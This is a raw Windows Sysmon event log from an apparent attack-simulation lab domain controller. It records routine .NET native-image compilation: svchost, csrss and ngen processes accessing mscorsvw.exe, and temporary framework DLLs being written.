13:20:23.642{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4517-6000-5C01-000000009A01}3368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005519Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:23.627{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4517-6000-5C01-000000009A01}3368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005518Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:23.627{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4517-6000-5C01-000000009A01}3368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005517Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:23.627{08A6967A-4288-6000-1500-000000009A01}13241668C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005516Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:23.595{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4517-6000-5B01-000000009A01}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005515Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:23.580{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4517-6000-5B01-000000009A01}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005514Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:23.580{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4517-6000-5B01-000000009A01}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005513Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:23.486{08A6967A-4516-6000-5A01-000000009A01}2192C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\890-0\System.Web.Services.dll2021-01-14 13:20:23.486 10341000x80000000000000005534Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:24.189{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4518-6000-6001-000000009A01}4292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005533Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:24.174{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4518-6000-6001-000000009A01}4292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005532Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:24.174{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4518-6000-6001-000000009A01}4292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005531Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:24.111{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4518-6000-5F01-000000009A01}2284C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005530Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:24.096{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4518-6000-5F01-000000009A01}2284C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005529Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:24.096{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4518-6000-5F01-000000009A01}2284C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005528Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:24.049{08A6967A-4517-6000-5E01-000000009A01}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12d8-0\System.Configuration.Install.dll2021-01-14 13:20:24.049 10341000x80000000000000005541Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:25.939{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4519-6000-6201-000000009A01}4132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005540Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:25.925{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4519-6000-6201-000000009A01}4132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005539Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:25.925{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4519-6000-6201-000000009A01}4132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005538Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:25.752{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4519-6000-6101-000000009A01}4676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005537Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:25.736{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4519-6000-6101-000000009A01}4676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005536Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:25.736{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4519-6000-6101-000000009A01}4676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005535Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:25.643{08A6967A-4518-6000-6001-000000009A01}4292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10c4-0\System.Xaml.dll2021-01-14 13:20:25.643 10341000x80000000000000005552Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:29.893{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-451D-6000-6501-000000009A01}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005551Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:29.877{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-451D-6000-6501-000000009A01}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005550Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:29.877{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-451D-6000-6501-000000009A01}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005549Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:29.815{08A6967A-451D-6000-6401-000000009A01}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e8c-0\System.Net.Http.dll2021-01-14 13:20:29.815 10341000x80000000000000005548Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:29.346{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-451D-6000-6401-000000009A01}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005547Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:29.346{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-451D-6000-6401-000000009A01}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005546Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 